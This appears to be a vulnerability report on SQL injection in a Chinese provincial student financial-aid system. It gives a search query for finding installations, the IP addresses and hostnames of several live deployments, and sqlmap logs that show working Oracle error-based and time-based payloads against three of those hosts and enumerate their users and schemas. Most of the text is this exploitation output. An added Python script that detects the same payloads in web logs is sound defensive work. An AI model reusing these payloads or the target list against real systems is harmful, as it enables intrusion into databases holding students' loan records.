A common SQL injection vulnerability exists in the financial aid management systems of multiple provinces.
In one province, the financial aid management system has this SQL injection vulnerability; in addition to injection through the glyxm parameter, injection through the xxmc parameter also exists.
http://music.google.cn/search?newwindow=1&q=infoms%2Fidentity%2Findex.c&btnG=Google+%E6%90%9C%E7%B4%A2
Nanjing jundu Technology Co., Ltd.
Some examples:
http://220.178.0.180/infoms/identity/index.c
http://218.76.27.109/infoms/identity/index.c
http://aid.ec.js.edu.cn/infoms/identity/index.c
http://202.119.175.107/infoms/identity/index.c
http://58.213.129.204/infoms/
http://58.213.129.204/infoms/visitor/getKpzh-list.c?glyxm=1&wdl=&xxmc=1
http://58.213.129.204/infoms/visitor/getKpzh-list.c?glyxm=1&wdl=&xxmc=1
Place: GET
Parameter: xxmc
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: glyxm=1&wdl=&xxmc=1' AND 4873=(select upper(XMLType(CHR(60)|CHR(58)|CHR(98)|CHR(121)|CHR(109)|CHR(58)|(SELECT (case when (4873=4873) THEN 1 ELSE 0 END) from dual)|CHR(58)|CHR(110)|CHR(112)|CHR(107)|CHR(58)|CHR(62))) from dual) AND 'gyta'='gyta
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: glyxm=1&wdl=&xxmc=1' AND 9115=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)|CHR(97)|CHR(76)|CHR(69),5) AND 'bsgg'='bsgg
---
There were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: xxmc, type: Single quoted string (default)
[1] place: GET, parameter: glyxm, type: Single quoted string
[Q] Quit
> 0
[21:19:02] [INFO] the back-end DBMS is Oracle
Web application technology: Nginx, JSP
Back-end DBMS: Oracle
[21:19:02] [INFO] fetching current user
[21:19:02] [INFO] retrieved: USR_LOAN
Current user: 'usr_loan'
[21:19:02] [INFO] fetching current database
[21:19:02] [INFO] resumed: USR_LOAN
Current schema (equivalent to database on Oracle): 'usr_loan'
[21:19:02] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[21:19:02] [INFO] fetching database (schema) names
[21:19:02] [INFO] the SQL query used returns 20 entries
[21:19:03] [INFO] retrieved: CTXSYS
[21:19:04] [INFO] retrieved: DBSNMP
[21:19:04] [INFO] retrieved: DMSYS
[21:19:05] [INFO] retrieved: EXFSYS
[21:19:05] [INFO] retrieved: MDSYS
[21:19:06] [INFO] retrieved: OLAPSYS
[21:19:06] [INFO] retrieved: ORDSYS
[21:19:07] [INFO] retrieved: OUTLN
[21:19:07] [INFO] retrieved: SYS
[21:19:08] [INFO] retrieved: SYSMAN
[21:19:08] [INFO] retrieved: SYSTEM
[21:19:09] [INFO] retrieved: TSMSYS
[21:19:09] [INFO] retrieved: USR_JCMS
[21:19:10] [INFO] retrieved: USR_JIANGSU
[21:19:10] [INFO] retrieved: USR_LOAN
[21:19:11] [INFO] retrieved: USR_LOAN_TEST
[21:19:11] [INFO] retrieved: USR_ZJ
[21:19:11] [INFO] retrieved: VIDEO
[21:19:12] [INFO] retrieved: WMSYS
[21:19:12] [INFO] retrieved: XDB
http://202.119.175.107/infoms/visitor/getKpzh-list.c?glyxm=1&wdl=&xxmc=1
Place: GET
Parameter: xxmc
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: glyxm=1&wdl=&xxmc=1' AND 5005=(select upper(XMLType(CHR(60)|CHR(58)|CHR(117)|CHR(107)|CHR(117)|CHR(58)|(SELECT (case when (5005=5005) THEN 1 ELSE 0 END) from dual)|CHR(58)|CHR(116)|CHR(113)|CHR(102)|CHR(58)|CHR(62))) from dual) AND 'ovnr'='ovnr
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: glyxm=1&wdl=&xxmc=1' AND 8587=DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)|CHR(120)|CHR(88)|CHR(68),5) AND 'trmp'='trmp
---
[21:20:03] [INFO] the back-end DBMS is Oracle
Web application technology: Nginx, JSP
Back-end DBMS: Oracle
[21:20:03] [INFO] fetching current user
[21:20:03] [INFO] retrieved: USR_LOAN
Current user: 'usr_loan'
[21:20:03] [INFO] fetching current database
[21:20:03] [INFO] resumed: USR_LOAN
Current schema (equivalent to database on Oracle): 'usr_loan'
[21:20:03] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[21:20:03] [INFO] fetching database (schema) names
[21:20:04] [INFO] the SQL query used returns 20 entries
[21:20:04] [INFO] retrieved: CTXSYS
[21:20:04] [INFO] retrieved: DBSNMP
[21:20:05] [INFO] retrieved: DMSYS
[21:20:05] [INFO] retrieved: EXFSYS
[21:20:06] [INFO] retrieved: MDSYS
[21:20:06] [INFO] retrieved: OLAPSYS
[21:20:06] [INFO] retrieved: ORDSYS
[21:20:07] [INFO] retrieved: OUTLN
[21:20:07] [INFO] retrieved: SYS
[21:20:08] [INFO] retrieved: SYSMAN
[21:20:08] [INFO] retrieved: SYSTEM
[21:20:08] [INFO] retrieved: TSMSYS
[21:20:12] [INFO] retrieved: USR_JCMS
[21:20:12] [INFO] retrieved: USR_JIANGSU
[21:20:13] [INFO] retrieved: USR_LOAN
[21:20:13] [INFO] retrieved: USR_LOAN_TEST
[21:20:14] [INFO] retrieved: USR_ZJ
[21:20:14] [INFO] retrieved: VIDEO
[21:20:15] [INFO] retrieved: WMSYS
[21:20:15] [INFO] retrieved: XDB
http://aid.ec.js.edu.cn/infoms/visitor/getKpzh-list.c?glyxm=1&wdl=&xxmc=1
Place: GET
Parameter: xxmc
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: glyxm=1&wdl=&xxmc=1' AND 7775=(select upper(XMLType(CHR(60)|CHR(58)|CHR(107)|CHR(111)|CHR(114)|CHR(58)|(SELECT (case when (7775=7775) THEN 1 ELSE 0 END) from dual)|CHR(58)|CHR(106)|CHR(98)|CHR(116)|CHR(58)|CHR(62))) from dual) AND 'yvpq'='yvpq
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: glyxm=1&wdl=&xxmc=1' AND 9630=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)|CHR(99)|CHR(70)|CHR(101),5) AND 'tvtr'='tvtr
---
[21:21:35] [INFO] the back-end DBMS is Oracle
Web application technology: Nginx, JSP
Back-end DBMS: Oracle
[21:21:35] [INFO] fetching current user
[21:21:35] [INFO] retrieved: USR_LOAN
Current user: 'usr_loan'
[21:21:35] [INFO] fetching current database
[21:21:35] [INFO] resumed: USR_LOAN
Current schema (equivalent to database on Oracle): 'usr_loan'
[21:21:35] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[21:21:35] [INFO] fetching database (schema) names
[21:21:35] [INFO] the SQL query used returns 20 entries
[21:21:36] [INFO] retrieved: CTXSYS
[21:21:36] [INFO] retrieved: DBSNMP
[21:21:37] [INFO] retrieved: DMSYS
[21:21:37] [INFO] retrieved: EXFSYS
[21:21:37] [INFO] retrieved: MDSYS
[21:21:38] [INFO] retrieved: OLAPSYS
[21:21:38] [INFO] retrieved: ORDSYS
[21:21:38] [INFO] retrieved: OUTLN
[21:21:39] [INFO] retrieved: SYS
[21:21:39] [INFO] retrieved: SYSMAN
[21:21:40] [INFO] retrieved: SYSTEM
[21:21:40] [INFO] retrieved: TSMSYS
[21:21:41] [INFO] retrieved: USR_JCMS
[21:21:41] [INFO] retrieved: USR_JIANGSU
[21:21:42] [INFO] retrieved: USR_LOAN
[21:21:42] [INFO] retrieved: USR_LOAN_TEST
[21:21:43] [INFO] retrieved: USR_ZJ
[21:21:43] [INFO] retrieved: VIDEO
[21:21:44] [INFO] retrieved: WMSYS
[21:21:44] [INFO] retrieved: XDB
Available databases [20]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] USR_JCMS
[*] USR_JIANGSU
[*] USR_LOAN
[*] USR_LOAN_TEST
[*] USR_ZJ
[*] VIDEO
[*] WMSYS
[*] XDB
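As an added example (not part of the original report or the vendor's code), the following Python script scans Nginx access-log lines for requests to the infoms endpoints whose glyxm or xxmc parameter carries the signatures shown above: the Oracle error-based XMLType payload and the DBMS_PIPE.RECEIVE_MESSAGE time-based payload. The combined log format, the client IP 198.51.100.7, the timestamps and the three log lines are all constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Nginx "combined" access-log format (assumed): ip ident user [time] "request" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Signatures of the two techniques in the report: Oracle error-based (XMLType) and
# time-based (DBMS_PIPE.RECEIVE_MESSAGE), matched against the URL-decoded value.
INDICATORS = [
    ("quote_breakout", re.compile(r"'\s*(AND|OR)\b", re.I)),
    ("oracle_errorbased_xmltype", re.compile(r"XMLType\s*\(", re.I)),
    ("oracle_timebased_dbms_pipe", re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE", re.I)),
    ("chr_concat", re.compile(r"CHR\s*\(\s*\d+\s*\)\s*\|\|?\s*CHR", re.I)),
    ("from_dual", re.compile(r"\bFROM\s+DUAL\b", re.I)),
]
WATCHED_PARAMS = ("glyxm", "xxmc")  # the two parameters the report names as injectable

def indicators_for(value):
    """Names of every indicator that fires on one decoded parameter value."""
    return [name for name, rx in INDICATORS if rx.search(value)]

def scan_log(lines):
    """Return (client_ip, parameter, indicators) for each watched infoms parameter that fires."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        target = urlsplit(m.group("target"))
        if "/infoms/" not in target.path:
            continue
        params = parse_qs(target.query, keep_blank_values=True)  # percent-decodes values
        for name in WATCHED_PARAMS:
            for value in params.get(name, []):
                found = indicators_for(value)
                if found:
                    hits.append((m.group("ip"), name, found))
    return hits

# Constructed sample: one benign request, then the two payload shapes from the report.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2014:21:18:59 +0800] "GET /infoms/visitor/getKpzh-list.c?glyxm=1&wdl=&xxmc=1 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Mar/2014:21:19:02 +0800] "GET /infoms/visitor/getKpzh-list.c?glyxm=1&wdl=&xxmc=1%27%20AND%204873%3D(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)))%20FROM%20dual)%20AND%20%27gyta%27%3D%27gyta HTTP/1.1" 500 612 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Mar/2014:21:19:07 +0800] "GET /infoms/visitor/getKpzh-list.c?glyxm=1&wdl=&xxmc=1%27%20AND%209115%3DDBMS_PIPE.RECEIVE_MESSAGE(CHR(119)%7C%7CCHR(97),5)%20AND%20%27bsgg%27%3D%27bsgg HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, param, found in scan_log(SAMPLE_LOG):
        print(f"{ip} {param}: {', '.join(found)}")
```

A 500 status on the error-based line and a response time near the 5-second DBMS_PIPE delay on the time-based line are the corroborating fields to pull from the same log.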
Solution:
Filter the injectable parameters (glyxm and xxmc).